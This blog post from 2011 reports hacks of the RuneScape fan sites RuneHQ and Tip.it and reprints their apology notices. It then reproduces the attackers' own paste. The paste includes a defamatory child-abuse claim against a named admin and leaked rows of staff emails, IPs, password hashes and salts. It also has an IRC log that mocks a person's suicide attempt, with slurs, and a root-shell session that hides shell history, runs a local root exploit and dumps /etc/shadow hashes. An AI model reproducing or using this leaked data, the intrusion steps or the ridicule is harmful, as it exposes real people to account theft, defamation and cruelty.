Wednesday, October 12, 2011

RuneHQ hacked


So what exactly happened?
Well, we were the latest victims of a nasty group of people going around finding vulnerabilities in RuneScape fan sites. There was an old, outdated piece of code lingering on our site longer than it should have been and these guys took advantage of it. They managed to grab the entire members database including emails, RHQ login and display names, hashed passwords, and more.
At some point we figured out the hole in our security and a hotfix was implemented preventing this type of action further, but it was too late as they already had what they came for. When it was discovered exactly what had happened, we took the forums offline completely and began to investigate our options.
In the end we decided to completely start fresh with the forums. We decided this for a couple reasons.
  • Our database had been filling up with junk for a number of years. It was time to clean it up and clear some things out anyways.
  • You would all be required to at the very least enter a new password. We probably would have required a new login name as well.
  • There was initially a minor glitch in the backup process with our forums.
  • The hackers were also sometimes using info posted on your HQ accounts to help try and recover your accounts. Removing everything prevents them from having any current info or quite as easily being able to match up who is who.
  • A number of people would ask for their accounts to be removed anyways due to a lack of trust from us now.
It was just better for everyone's safety to wipe it all. We are aware of who is responsible, so please do not post any links regarding this issue as it will only lead to an instant ban of your account.
On behalf of everyone here at RuneHQ, I'm deeply sorry that this happened and I apologize for everything that has taken place. I hope you continue to use us as your number one source for all RuneScape information as we will continuing striving to be the best help site out there.
When you re-register, please keep in mind that you should NEVER use your RuneScape password on any other website. Your password should also be complex. Here is a very short list of passwords you should never use:
  • password
  • dragon
  • runescape
  • qwerty
  • abc123
  • [your username]
  • [anything that is one, simple, real word]

Sphere: Related Content

Tip.it got hacked


Hello Folks,

As you know Tip.It and Forum.Tip.It have been down most of October 11 and continues to be down. Tip.It's servers were unfortunately hacked and the only way to ensure user security and regain control of our servers was to shut down the servers until we can be completely confident that they are safe again. 

As a result, it is likely that segments of our user database were dumped and are now in the hands of other people to use against your RuneScape account or other online accounts. The stolen data may or may not include usernames, password hashes, email addresses, IP addresses and any other information you may have provided on the Tip.It Forums. Please note that your forum password was absolutely NOT stored in plain text - all passwords on our forums are encrypted and will require brute forcing from the hackers in order to render them usable. Regardless, we are assuming the worst and recommending you take action now to ensure your accounts are all secure.

It is highly recommended to ensure that your password and email address used on Tip.It are NOT used ANYWHERE else on the internet, especially on your RuneScape account. If you use the same password and/or email address on your RuneScape account, it is HIGHLY likely that your account will be compromised sooner or later. Don't take the risk - use a UNIQUE password and email address on your RuneScape account to insure maximum security. 

We also highly recommend you beef up the security on your email address. Often times hackers can gain access to your email and wreak havoc by accessing any accounts tied into that particular email. A few tips to ensure email account safety:
-Don't be sloppy on your recoveries - make them as difficult to crack as your password. Random numbers, letters and symbols with mixed cases works beautifully!
-Delete old emails you have no need to keep - the less information stored in your email the better!
-Use two-step verification with your mobile device wherever possible - this is powerful tool to keep unauthorized people out of your email!

As of now, approximately 0230 GMT on October 12, 2011, and for several hours prior to this, all Tip.It's servers are entirely under the control of the Tip.It administration. Every effort is being made by the administration to restore normal service as soon as possible. 

Lastly, all rumours surrounding Tip.It Administrators' involvement in child pornography are entirely FALSE and are exactly that - RUMOURS. No staff members at Tip.It are involved in the creation or distribution of child pornography nor is there pornography of any kind on Tip.It servers. These are simply rumours created to cause controversy in the community - and it has worked. Again, these allegations are ENTIRELY FALSE.

This is all the information available at this point. We will do our best to continue to update the community as much as possible through these difficult times. We appreciate your support during this rough time and we apologize for the inconvenience that this downtime causes to your game play.

Respectfully yours,

Tip.It Administrative Team


  



         ,.         ,·´'; '        ,.-·.                ,.-·~·-., '                   ,.-·~·-., '                        ,.,   '               ,. –  - .,  °            ,. -  .,                           ,. -,    
      ;'´*´ ,'\       ,'  ';'\°      /    ;'\'         ,.·´ ,. - .,   '`.             ,.·´ ,. - .,   '`.                     ;´   '· .,             ';_,.., _     '`. '      ,' ,. -  .,  `' ·,              ,.·'´,    ,'\   
      ;    ';::\      ;  ;::'\     ;    ;:::\      ,'´ ,·´\::::::::`;  ';\  '      ,'´ ,·´\::::::::`;  ';\  '              .´  .-,    ';\            \:::::::::::';   ,'\     '; '·~;:::::'`,   ';\       ,·'´ .·´'´-·'´::::\' 
     ;      '\;'      ;  ;:::;    ';    ;::::;'    ,'  ;'::::\;::-::;:';  ;:\      ,'  ;'::::\;::-::;:';  ;:\              /   /:\:';   ;:'\'           '\_;::;:,·´  .·´::\‘    ;   ,':\::;:´  .·´::\'    ;    ';:::\::\::;:'  
    ,'  ,'`\   \      ;  ;:::;     ;   ;::::;     ';  ';::;·´       ,'  ,'::';     ';  ';::;·´       ,'  ,'::';           ,'  ,'::::'\';  ;::';               , '´ .·´:::::;'      ;  ·'-·'´,.-·'´:::::::';   \·.    `·;:'-·'´     
    ;  ;::;'\  '\    ;  ;:::;     ';  ;'::::;     .';'\  '\;'       .'  .':::::;'   .';'\  '\;'       .'  .':::::;'      ,.-·'  '·~^*'´¨,  ';::;             .´  .'::::::;·´'     ;´    ':,´:::::::::::·´'     \:`·.   '`·,  '     
   ;  ;:::;  '\  '\ ,'  ;:::;'     ;  ';:::';    ';  \:'.   '·,  ,·´ .·'::::::;'  ';  \:'.   '·,  ,·´ .·'::::::;'       ':,  ,·:²*´¨¯'`;  ;::';         .·´ ,·´:::::;·´          ';  ,    `·:;:-·'´            `·:'`·,   \'      
  ,' ,'::;'     '\   ¨ ,'\::;'      ';  ;::::;'    \   `·:`·   '´ ;´::::::::;' '   \   `·:`·   '´ ;´::::::::;' '       ,'  / \::::::::';  ;::';      ,·´  .´;::–·~^*'´';\‚      ; ,':\'`:·.,  ` ·.,            ,.'-:;'  ,·\     
  ;.'\::;        \`*´\::\; °      \*´\:::;‘      \` ·- · :\`·.  `·:;:·´ '       \` ·- · :\`·.  `·:;:·´ '        ,' ,'::::\·²*'´¨¯':,'\:;       '.,_ ,. -·~:*'´¨¯:\:\ °   \·-;::\:::::'`:·-.,';     ,·'´     ,.·´:::'\    
  \:::\'          '\:::\:' '         '\::\:;'        '\::::::::\:;` · .,.'·  '       '\::::::::\:;` · .,.'·  '       \`¨\:::/          \::\'        \:::::::::::::::::::\;      \::\:;'` ·:;:::::\::\'    \`*'´\::::::::;·'‘   
    \:'             `*´'‚             `*´‘           ` ·- · '´`·:::::\::\           ` ·- · '´`·:::::\::\          '\::\;'            '\;'  '       \:;_;::-·~^*'´¨¯'         '·-·'       `' · -':::''    \::::\:;:·´        
                                                                ` · :\_\‚                     ` · :\_\‚          `¨'                                                                                 '`*'´‘            

~ Raflz - Led-Zeppelin - Sigex3unit ~

heya friends!

So.. the niqaz here trollin' along the tip.it sidewalk when we hear some rumours about a tip.it box seeding childporn..                      
Immediately this grabs our attention due to the fact we're all huge humanitarians and really care about kids.                                
We start an investigation into this.                                                                                                         
During our investigation we find out silverion and associates ALSO abuse all types of kids and users into buying their site merchandise and..
They make over 2K USD a day doing so, selling shirts, cups, and what not, including ads.                                                     
So, we decide that we have to hack tip.it as we start to find growing evidence of such horrible activity                                     
and sure enough, after about one week of doing our magic we get in.                                                                          
THERE IN THE /home/ FOLDER.. NEED I EVEN SAY WHAT WE FOUND? WHAT DO YOU THINK?                                                               

SILVERION IS FUCKING SICK.                                                                                                                   
The only thing to do now is to force-close tip.it.                                                                                           
To all the children who may have been approached sexually by silverion or other admins.                                                      
Please contact the police or go see a shrink as we have some logs of this happening, but will not be posting.                                

Truly a horrible thing to find.

Now how about them jagex mods getting hacked? uh oh I think we might be responsible!!                                                                                                                                                                                                                 
|    193396 | mithandriel                           | tim.gaming@gmail.com                                                                  | 212.44.19.206   | ca3e57f0732fe8df2e686f8f099b7676 | jGnuv             | darth_vader                           | mithandriel                           |
|    209342 | baker011                              | gregg.baker@jagex.com                                                                 | 212.44.19.206   | 022176e3ab7f735f5298b7eb96ddcd81 | $":l'             | baker011                              | baker011                              |
|        65 | Paul                                  | paul@jagex.com                                                                        |                 |                                  |                   | paul                                  | paul                                  |
|      4906 | rincewind01                           | simon.brace@jagex.com                                                                 |                 |                                  |                   | rincewind01                           | rincewind01                           |
|      5720 | Tolakin                               | tytn@jagex.com                                                                        |                 |                                  |                   | tolakin                               | tolakin                               |
|     10899 | blutack                               | mark.ogilvie@jagex.com                                                                |                 |                                  |                   | blutack                               | blutack                               |
|     91774 | Ross_Mills                            | ross.mills@jagex.com                                                                  |                 |                                  |                   | ross_mills                            | ross_mills                            |
|    112488 | 74387454at                            | lameo@jagex.com                                                                       |                 |                                  |                   | 74387454at                            | 74387454at                            |
|    187651 | Hohbein                               | chris.hohbein@jagex.com                                                               | 212.44.19.206   | b7222735fce3760e0191e03499897b69 | rTu]z             | hohbein                               | hohbein                               |
|    209920 | Eduardo                               | fansites@jagex.com                                                                    | 69.11.111.56    | fa9ce04dffbc8932ec441b71c559dafa | kam}c             | eduardo                               | eduardo                               |
|    182633 | Pilbeam                               | 6894@tmp                                                                              | 212.44.19.206   |                                  |                   | pilbeam                               | pilbeam                               |
|    181507 | Choobein                              | hohbeinfansites@googlemail.com                                                        | 212.44.19.206   |                                  |                   | choobein                              | choobein                              |
|    165641 | obidiah                               | friedkipper@yahoo.co.uk                                                               | 212.44.19.206   | 3baea46bf195edde0379f62e808b35da |                   | obidiah                               | obidiah                               |
|    209343 | Zachory                               | zacantonaci@hotmail.com                                                               | 212.44.19.206   | 799c2d48ac83dfa95695f63192c7d880 | [p-Z2             | _zach_                                | zachory                               |
|  181727 | 74387454at                | f5e86ffe2cbe84e75097f44e402c6429 | lameo@jagex.com                                                              | fronttooth       | 87648                                                                                                                   |
|  160956 | Ross_Mills                | 1b26983ac0ebbeca11089af9032762e3 | ross.mills@jagex.com                                                         | NULL             |                                                                                                                         |
|   19726 | blutack                   | 8869aff85a1be23274b622b2f6d1fe33 | mark.ogilvie@jagex.com                                                       | NULL             |                                                                                                                         |
|    8934 | Tolakin                   | 2634bf743a7199dc2aab20987b42bf02 | tytn@jagex.com                                                               | NULL             |                                                                                                                         |
|    7364 | rincewind01               | d2aa6a7090d9a3d20df7376a109b349d | simon.brace@jagex.com                                                        | NULL             |                                                                                                                         |
|      68 | Paul                      | afaa6fc39a06abac971ad4f747bb830e | Paul@jagex.com                                                               |                  |                                                                                                                         |

and just for the lulz...

| 12018 | Zezima | 4dce43b48137ec3cd5782f8dc8728c10 | peter_zezima@hotmail.com | | | 7399 | Zezima | peter_zezima@hotmail.com | 137.99.170.196 | 4a6bafbda23f350cc394fb91d178f10d | ?L5b. | zezima | zezima |

irc.SwiftIRC.net

                                                                                                                                               
                                                                                   iiii                                                        
     ######    ######                                                             i::::i                                                       
     #::::#    #::::#                                                              iiii                                                        
     #::::#    #::::#                                                                                                                          
######::::######::::######rrrrr   rrrrrrrrr       ssssssssss   nnnn  nnnnnnnn    iiiiiii    qqqqqqqqq   qqqqq aaaaaaaaaaaaa   zzzzzzzzzzzzzzzzz
#::::::::::::::::::::::::#r::::rrr:::::::::r    ss::::::::::s  n:::nn::::::::nn  i:::::i   q:::::::::qqq::::q a::::::::::::a  z:::::::::::::::z
######::::######::::######r:::::::::::::::::r ss:::::::::::::s n::::::::::::::nn  i::::i  q:::::::::::::::::q aaaaaaaaa:::::a z::::::::::::::z 
     #::::#    #::::#     rr::::::rrrrr::::::rs::::::ssss:::::snn:::::::::::::::n i::::i q::::::qqqqq::::::qq          a::::a zzzzzzzz::::::z  
     #::::#    #::::#      r:::::r     r:::::r s:::::s  ssssss   n:::::nnnn:::::n i::::i q:::::q     q:::::q    aaaaaaa:::::a       z::::::z   
######::::######::::###### r:::::r     rrrrrrr   s::::::s        n::::n    n::::n i::::i q:::::q     q:::::q  aa::::::::::::a      z::::::z    
#::::::::::::::::::::::::# r:::::r                  s::::::s     n::::n    n::::n i::::i q:::::q     q:::::q a::::aaaa::::::a     z::::::z     
######::::######::::###### r:::::r            ssssss   s:::::s   n::::n    n::::n i::::i q::::::q    q:::::qa::::a    a:::::a    z::::::z      
     #::::#    #::::#      r:::::r            s:::::ssss::::::s  n::::n    n::::ni::::::iq:::::::qqqqq:::::qa::::a    a:::::a   z::::::zzzzzzzz
     #::::#    #::::#      r:::::r            s::::::::::::::s   n::::n    n::::ni::::::i q::::::::::::::::qa:::::aaaa::::::a  z::::::::::::::z
     ######    ######      r:::::r             s:::::::::::ss    n::::n    n::::ni::::::i  qq::::::::::::::q a::::::::::aa:::az:::::::::::::::z
                           rrrrrrr              sssssssssss      nnnnnn    nnnnnniiiiiiii    qqqqqqqq::::::q  aaaaaaaaaa  aaaazzzzzzzzzzzzzzzzz
                                                                                                     q:::::q                                   
                                                                                                     q:::::q                                   
                                                                                                    q:::::::q                                  
                                                                                                    q:::::::q                                  
                                                                                                    q:::::::q                                  
                                                                                                    qqqqqqqqq                                  
                                                                                                                                               




* Naffy (~JamesMurr@Swift-D212DF66.lnk.telstra.net) has joined #rsniqaz
 Hey narbs
<@Raflz> helo
<@Raflz> welcome bak 4m da ded
<@Raflz> wud u like tip it db
<@Raflz> to feast
 Hey man
 Do you guys all think im trolling?
<@Raflz> LOL
<@Raflz> should've hit the car faster bro
 LOL
 I really dont need this
 I'll talk to you guys later
 Ive been in the psych ward
 since sunday night
<@Raflz> ROFL
<@Raflz> do u want
<@Raflz> tip.it
 I just got out 
<@Raflz> to feast
<@Raflz> or not
 yeah.
 I would
 if thats a possibility
<@Raflz> i love you man
<@Raflz> im not gonna lie
 i really feel like doing it gave my life direction
<@Raflz> lets b butt buddiez
 I actually learnt something
 Yeah
<@Raflz> like
<@Raflz> how to hit a car faster
 hitting parked cars at 120KM/h hurts
 eh
<@Raflz> lesson:
 i'll paste the convo I had
<@Raflz> if ur gonna suicide
 right before I hit it
 with my mate
<@Raflz> hit a car faster next time
<@Raflz> LOL
 while i was snorting oxy
 ok
 paste it
<@Raflz> paste it pls
 wait up
 If you can beat me in a game of LoL 1v1
 i will give you tip.it
 me: man
 if i actually went through with it
 now
 would I be a bad person?
 Would I be selfish?
 him: Not worth it man
 Seriously
 Fucking
 You're actually intelligent
 me: but.. itd be over for me
 This convo suddenly turned really gay
 k
 No
 continue
 but yeah theres more
 o
 me: but there will be others man
 others like me
 others with such power.
 i see everything man, i know im insane
 but ive seen it for a long time
 i feel like i can see peoples thoughts
 I was referring to raflz use of the term 'bluenaffle' in pm
 him: There's no such thing as insane
 It's just difficult dealing with what you know
 Happened to my uncle
 me: ive got the keys man
 Im going to think about it on the drive
 but.. i always enjoyed talking to you.
<@Raflz> LOL
 i'll see you in another life brother
 im getting the last little pieces
 before i walk to the car
 one last cigarette.
 i told you 5
 so i'll stick to that
<@Raflz> man
<@Raflz> why didnt you hit it faster
 Can you see people naked?
<@Raflz> you just suck
 they wont come to terms with it
 but they will understand it.
 i'm hoping my dad left the keys.
 and if he didnt, they'll be on the kitchen table.
 whats your number?
 I'll give you a ring
 i lost control
 never really driven before
<@Raflz> just
<@Raflz> 120km/h rofl
 ok raflz
 dont be mean
 dude, that's pretty fucking fast.
 naffy is our friend
<@Raflz> no it isnt
<@Raflz> fuck off
 didnt feel like it 

Oh dem niqqaz, how do dey do it
[root@ldx ~]# ssh tip.it -lbulat

bulat@tip.it's password:

[bulat@web01 root]$ export HISTFILE=/dev/null
[bulat@web01 root]$ uname -a
Linux web01.tip.it 2.6.34.9-69.fc13.x86_64 #1 SMP Tue May 3 09:23:03 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
[bulat@web01 root]$ ./tr1p
Enter b1tch key: ******
[+] Tr1p/SSDTX local root exploit by g4yh1tl3r
[+] Resolved commit_creds to ffffffff8106b909
[+] Resolved prepare_kernel_cred to ffffffff8106b7f1
[+] Us1ng 1dt b1tch br34k
[+] Preparing underflow payload
[+] Mapped ZERO PAGE!
[root@web01 ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@web01 ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
vcsa:x:69:498:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
nscd:x:28:497:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:496:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:495:Apache:/var/www:/sbin/nologin
haldaemon:x:68:494:HAL daemon:/:/sbin/nologin
openvpn:x:498:493:OpenVPN:/etc/openvpn:/sbin/nologin
distcache:x:94:492:Distcache:/:/sbin/nologin
saslauth:x:497:491:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:490::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:489::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:496:488:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:487:MySQL Server:/var/lib/mysql:/bin/bash
nm-openconnect:x:495:486:NetworkManager user for OpenConnect:/:/sbin/nologin
webalizer:x:67:485:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
dovecot:x:494:483:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
backuppc:x:493:481::/var/lib/BackupPC:/sbin/nologin
torrent:x:492:480:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
bulat:x:500:500::/home/bulat:/bin/bash
wizard:x:501:501::/home/wizard:/bin/bash
eira:x:502:502::/home/eira:/bin/bash
beta:x:503:503::/home/beta:/bin/bash
peter:x:504:504::/home/peter:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
clamupdate:x:491:477:Clamav database update user:/var/lib/clamav:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
ntpd:x:505:505::/home/ntpd:/bin/bash
[root@web01 ~]# cat /etc/shadow
root:$1$qIp096Pv$zl2.573V3Ovhc5B/aYw0G/:15101:0:99999:7:::
bin:*:14715:0:99999:7:::
daemon:*:14715:0:99999:7:::
adm:*:14715:0:99999:7:::
lp:*:14715:0:99999:7:::
sync:*:14715:0:99999:7:::
shutdown:*:14715:0:99999:7:::
halt:*:14715:0:99999:7:::
mail:*:14715:0:99999:7:::
uucp:*:14715:0:99999:7:::
operator:*:14715:0:99999:7:::
games:*:14715:0:99999:7:::
gopher:*:14715:0:99999:7:::
ftp:*:14715:0:99999:7:::
nobody:*:14715:0:99999:7:::
dbus:!!:15101::::::
avahi-autoipd:!!:15101::::::
vcsa:!!:15101::::::
rpc:!!:15101:0:99999:7:::
named:!!:15101::::::
oprofile:!!:15101::::::
nscd:!!:15101::::::
rpcuser:!!:15101::::::
nfsnobody:!!:15101::::::
apache:!!:15101::::::
haldaemon:!!:15101::::::
openvpn:!!:15101::::::
distcache:!!:15101::::::
saslauth:!!:15101::::::
mailnull:!!:15101::::::
smmsp:!!:15101::::::
ntp:!!:15101::::::
avahi:!!:15101::::::
mysql:!!:15101::::::
nm-openconnect:!!:15101::::::
webalizer:!!:15101::::::
sshd:!!:15101::::::
squid:!!:15101::::::
dovecot:!!:15101::::::
tcpdump:!!:15101::::::
backuppc:!!:15101::::::
torrent:!!:15101::::::
bulat:$1$pbU71z/Y$B7ZmB6iJ06oaE.IBQfVPZ1:15102:0:99999:7:::
wizard:$1$CBfOJrU/$OZt5/z.bvCz8jSe5dGv4z0:15101:0:99999:7:::
eira:$1$mgj4N28N$t41xK8Keu/zcZbWQYDcrM/:15102:0:99999:7:::
beta:$1$D9qXxl5h$lLqbnp2aQu.TBT5CP/ZTZ/:15114:0:99999:7:::
peter:$1$Rw2yjv6w$9VRHWzZzZGsZdar5O0vbu/:15113:0:99999:7:::
postfix:!!:15102::::::
clamupdate:!!:15149::::::
qemu:!!:15149::::::
ntpd:$1$oIM2m0O9$utO5JUZ5DSsF2ZtcsMb4t1:15253:0:99999:7:::
[root@web01 ~]# cd ~bulat
[root@web01 bulat]# cat .bash_history
su -
ls
ls -lt
sftp bulat@forum.tip.it
[root@web01 bulat]# ls -la
total 9683064
drwx------   6 bulat bulat       4096 Oct 11 07:50 .
drwxr-xr-x.  8 root  root        4096 Oct  6 10:49 ..
drwxr-xr-x   3 bulat bulat       4096 Oct  7 01:11 b2
-rw-r--r--   1 bulat bulat    8918314 Sep  6 15:10 backup-forum-etc-06092011.tar.gz
-rw-r--r--   1 root  root     7174178 Sep 26 15:51 backup-forum-etc-26092011.tar.gz
-rw-r--r--   1 root  root   403491046 Sep 26 15:50 backup-forum-mysql-26092011.tar.gz
-rw-r--r--   1 bulat bulat  493592011 Sep  6 15:58 backup-forum-www-06092011.tar.gz
-rw-r--r--   1 root  root  4322670602 Sep 26 15:44 backup-forum-www-26092011.tar.gz
-rw-r--r--   1 bulat bulat  399822071 Sep  6 07:58 backup-mysql-full-06092011.tar.gz
drwxr-xr-x  17 bulat bulat       4096 Oct  7 01:10 backups
drwxr-xr-x  14 bulat bulat       4096 Oct  7 01:14 backups-oldwww
-rw-r--r--   1 bulat bulat 4270006769 Sep  6 08:24 backup-www-full-06092011.tar.gz
-rw-r--r--   1 bulat bulat         18 May 21  2010 .bash_logout
-rw-r--r--   1 bulat bulat        176 May 21  2010 .bash_profile
-rw-r--r--   1 bulat bulat        124 May 21  2010 .bashrc
drwx------   3 bulat bulat       4096 Oct  9 08:09 .ssh
-rw-r--r--   1 bulat bulat        658 Mar 22  2010 .zshrc
[root@web01 bulat]# ls -la backup*
-rw-r--r--  1 bulat bulat    8918314 Sep  6 15:10 backup-forum-etc-06092011.tar.gz
-rw-r--r--  1 root  root     7174178 Sep 26 15:51 backup-forum-etc-26092011.tar.gz
-rw-r--r--  1 root  root   403491046 Sep 26 15:50 backup-forum-mysql-26092011.tar.gz
-rw-r--r--  1 bulat bulat  493592011 Sep  6 15:58 backup-forum-www-06092011.tar.gz
-rw-r--r--  1 root  root  4322670602 Sep 26 15:44 backup-forum-www-26092011.tar.gz
-rw-r--r--  1 bulat bulat  399822071 Sep  6 07:58 backup-mysql-full-06092011.tar.gz
-rw-r--r--  1 bulat bulat 4270006769 Sep  6 08:24 backup-www-full-06092011.tar.gz

backups:
total 18520536
drwxr-xr-x 17 bulat bulat       4096 Oct  7 01:10 .
drwx------  6 bulat bulat       4096 Oct 11 07:50 ..
-rw-r--r--  1 root  root    68802560 May 19 14:18 backup-etc-2011051901.tar
-rw-r--r--  1 root  root    22169600 May 18 18:01 backup-etc-20110519.tar
-rw-r--r--  1 root  root     9019408 May 19 14:18 backup-forum-etc-20091210.tar.gz
-rw-r--r--  1 root  root   403491046 Oct  6 10:52 backup-forum-mysql-26092011.tar.gz
-rw-r--r--  1 root  root   708034560 May 18 19:02 backup-mysql-20110519.tar
-rw-r--r--  1 root  root    48271360 May  8 02:39 backup-mysql-beta-20110507.tar
-rw-r--r--  1 root  root   699760640 May  8 02:41 backup-mysql-full-20110507.tar
-rw-r--r--  1 root  root   699627520 May  8 02:42 backup-mysql-full-20110508.tar
-rw-r--r--  1 root  root     2723840 May  8 02:42 backup-mysql-lotro-20110507.tar
-rw-r--r--  1 root  root   604866560 May  8 02:44 backup-mysql-runescape-20110507.tar
-rw-r--r--  1 root  root      870400 May  7 10:01 backup-w2-arena-20110507.tar
-rw-r--r--  1 root  root   960880640 May  7 10:03 backup-w2-beta-20110507.tar
-rw-r--r--  1 root  root    16844800 May  7 10:03 backup-w2-easygadget-20110507.tar
-rw-r--r--  1 root  root  3998003200 May  7 10:12 backup-w2-html-20110507.tar
-rw-r--r--  1 root  root    11192320 May  7 10:12 backup-w2-lotro-20110507.tar
-rw-r--r--  1 root  root       10240 May  7 10:12 backup-w2-trieste-20110507.tar
-rw-r--r--  1 root  root     1587200 May  7 10:12 backup-w2-war-20110507.tar
-rw-r--r--  1 root  root  5302497280 May 18 19:13 backup-www-20110519.tar
-rw-r--r--  1 root  root    68802560 May 19 14:18 backup-wwwetc-20110519.tar
drwx------  2 mysql mysql      12288 May  7 18:00 beta
-rw-r--r--  1 root  root    19850900 May  8 02:44 full-w2-mysql-20070828.tgz
-rw-r--r--  1 root  root    17941509 May  8 02:44 full-w2-mysql-20080608.tgz
-rw-r--r--  1 root  root  5245419520 May  7 10:24 full-w2-www-20110507.tar
drwx------  2 mysql mysql       4096 Jul  2  2007 lotro
drwx------  2 mysql mysql       4096 Mar  4  2007 MD_Stats
drwx------  2 mysql mysql       4096 Nov 24  2006 mysql
-rw-r--r--  1 root  root    19374500 May  8 02:44 mysql-20080827.tar.gz
drwx------  2 mysql mysql       4096 Dec 18  2003 mysql-old
-rw-r--r--  1 root  root    16208748 May  8 02:44 mysql.tar.gz-OLD
drwx------  2 mysql mysql       4096 Nov 24  2006 phpmyadmin
drwx------  2 mysql mysql       4096 May  8 00:51 PhpStats019
drwx------  2 mysql mysql       4096 Jul 11  2008 rewrite
drwx------  2 mysql mysql      12288 Oct  7 01:11 runescape
drwx------  2 mysql mysql       4096 Jan 30  2008 runescape_copy
drwx------  2 mysql mysql       4096 Sep 15  2007 silks
drwx------  2 mysql mysql       4096 Jul 30  2007 volantini
drwx------  2 mysql mysql       4096 Oct  2  2008 war
drwxr-xr-x 15 mysql mysql       4096 May 19 13:38 wwwsql
drwx------  2 mysql mysql       4096 Apr 14 02:34 zenit

backups-oldwww:
total 9586804
drwxr-xr-x 14 bulat bulat       4096 Oct  7 01:14 .
drwx------  6 bulat bulat       4096 Oct 11 07:50 ..
-rw-r--r--  1 root  root     9009631 May 21 12:54 backup-etc-2011051901.tar.gz
-rw-r--r--  1 root  root     9019408 May 21 12:54 backup-forum-etc-20091210.tar.gz
-rw-r--r--  1 root  root   435602073 May 21 12:55 backup-forum-html-20091210.tar.gz
-rw-r--r--  1 root  root     1222295 May 21 12:55 backup-forum-teamspeak-20091210.tar.gz
-rw-r--r--  1 root  root   201001674 May 21 12:59 backup-mysql-20110519.tar.gz
-rw-r--r--  1 root  root    13800344 May 21 13:00 backup-mysql-beta-20110507.tar.gz
-rw-r--r--  1 root  root   197321301 May 21 13:05 backup-mysql-full-20110507.tar.gz
-rw-r--r--  1 root  root   197287223 May 21 13:11 backup-mysql-full-20110508.tar.gz
-rw-r--r--  1 root  root      764740 May 21 13:11 backup-mysql-lotro-20110507.tar.gz
-rw-r--r--  1 root  root   172928002 May 21 13:16 backup-mysql-runescape-20110507.tar.gz
-rw-r--r--  1 root  root      298212 May 21 13:16 backup-w2-arena-20110507.tar.gz
-rw-r--r--  1 root  root   575464655 May 21 13:21 backup-w2-beta-20110507.tar.gz
-rw-r--r--  1 root  root    11999273 May 21 13:22 backup-w2-easygadget-20110507.tar.gz
-rw-r--r--  1 root  root  1682773384 May 21 13:45 backup-w2-html-20110507.tar.gz
-rw-r--r--  1 root  root     8756867 May 21 13:45 backup-w2-lotro-20110507.tar.gz
-rw-r--r--  1 root  root        1035 May 21 13:45 backup-w2-trieste-20110507.tar.gz
-rw-r--r--  1 root  root      824683 May 21 13:45 backup-w2-war-20110507.tar.gz
-rw-r--r--  1 root  root  2413773014 May 21 14:17 backup-www-20110519.tar.gz
-rw-r--r--  1 root  root     9009490 May 21 14:17 backup-wwwetc-20110519.tar.gz
drwx------  2 mysql mysql       4096 Aug 15  2008 beta
-rw-r--r--  1 root  root     8485310 May 21 14:17 full-db-backup-03-25-07.tar.gz
-rw-r--r--  1 root  root     6820368 May 21 14:17 full-db-backup-12-14-06.tar.gz
-rw-r--r--  1 root  root    30778399 May 21 14:18 full-db-backup-2010-04-25.1.tar.gz
-rw-r--r--  1 root  root    30778779 May 21 14:18 full-db-backup-2010-04-25.tar.gz
-rw-r--r--  1 root  root    19850900 May 21 14:18 full-w2-mysql-20070828.tgz
-rw-r--r--  1 root  root    17941509 May 21 14:19 full-w2-mysql-20080608.tgz
-rw-r--r--  1 root  root   586278595 May 21 14:21 full-w2-www-20070828.tgz
-rw-r--r--  1 root  root  2389188411 May 21 14:47 full-w2-www-20110507.tar.gz
drwx------  2 mysql mysql       4096 Jul  2  2007 lotro
drwx------ 16 mysql mysql       4096 Nov 24  2006 mysql
-rw-r--r--  1 root  root    19374500 May 21 14:47 mysql-20080827.tar.gz
-rw-r--r--  1 root  root    16208748 May 21 14:47 mysql.tar.gz-OLD
drwx------  2 mysql mysql       4096 Nov 24  2006 phpmyadmin
drwx------  2 mysql mysql       4096 Aug 27  2008 PhpStats019
drwx------  2 mysql mysql       4096 Jul 11  2008 rewrite
drwx------  2 mysql mysql       4096 Aug 16  2008 runescape
drwx------  2 mysql mysql       4096 Jan 30  2008 runescape_copy
drwxr-xr-x  3 root  root        4096 Oct  6 11:09 var
drwx------  2 mysql mysql       4096 Jul 30  2007 volantini
drwx------  2 mysql mysql       4096 Sep 16  2007 war
-rw-r--r--  1 root  root   740444414 May 21 14:51 www.tar.gz-OLD
